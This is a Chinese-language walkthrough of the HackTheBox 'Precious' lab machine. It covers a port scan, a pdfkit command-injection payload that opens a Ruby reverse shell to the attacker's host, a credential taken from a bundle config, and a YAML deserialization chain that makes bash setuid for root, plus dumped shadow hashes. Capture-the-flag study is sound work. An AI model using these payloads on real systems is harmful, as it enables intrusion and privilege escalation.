Precious - HackTheBox

基本信息

• https://www.hackthebox.com/home/machines/profile/513

• 10.10.11.189

端口扫描

22和80:

$ nmap -sC -sV -Pn 10.10.11.189
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-03 15:24 CST
Nmap scan report for 10.10.11.189
Host is up (0.31s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE    SERVICE   VERSION
22/tcp   open     ssh       OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 845e13a8e31e20661d235550f63047d2 (RSA)
|   256 a2ef7b9665ce4161c467ee4e96c7c892 (ECDSA)
|_  256 33053dcd7ab798458239e7ae3c91a658 (ED25519)
80/tcp   open     http      nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
2161/tcp filtered apc-agent
8045/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.64 seconds

80

需要加hosts：

10.10.11.189 precious.htb

输入URL转换成PDF：

pdfkit

测试pdf转换，发现使用pdfkit v0.8.6：

搜到相关漏洞：

• Command Injection in pdfkit | CVE-2022-25765 | Snyk
  https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795

reverse shell

打到ruby shell：

http://10.10.14.10:7777/?name=#{'%20`ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.14.10",4444))'`'}

信息

bundle config中得到henry用户密码：

henry:Q3c1AqGHtoI0aXAYFH

user flag

henry用户ssh登录，得到user flag：

提权信息

sudo -l 发现一个ruby脚本，调用yaml，找到原本的yaml文件确认yaml库版本：

yaml

yaml反序列化：

• Blind Remote Code Execution through YAML Deserialization
  https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/

提权 & root flag

构造一个恶意yml文件，调用ruby脚本触发命令执行：

dependencies.yml

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: chmod +s /usr/bin/bash
         method_id: :resolve

shadow

root:$y$j9T$a.ggVdbxv0sDezKDImKn91$BB2mMoZ0UwInxNcXuyDALhr4li59AHfVw5DuV0d5Ww1:19284:0:99999:7:::
henry:$y$j9T$Q/v28PgszKjK0KDbSATMs1$7K1zLKHnnClQLLI92aeVT9HQXA6bgaG4BOTgLTGi.gA:19261:0:99999:7:::

参考资料

• Command Injection in pdfkit | CVE-2022-25765 | Snyk
  https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
• Blind Remote Code Execution through YAML Deserialization
  https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/
• Precious - HTB [Discussion] | BreachForums
  https://breached.vc/Thread-Precious-HTB-Discussion
• HTB - Precious [Easy] // meowmeowattack
  https://meowmeowattack.github.io/htb/precious/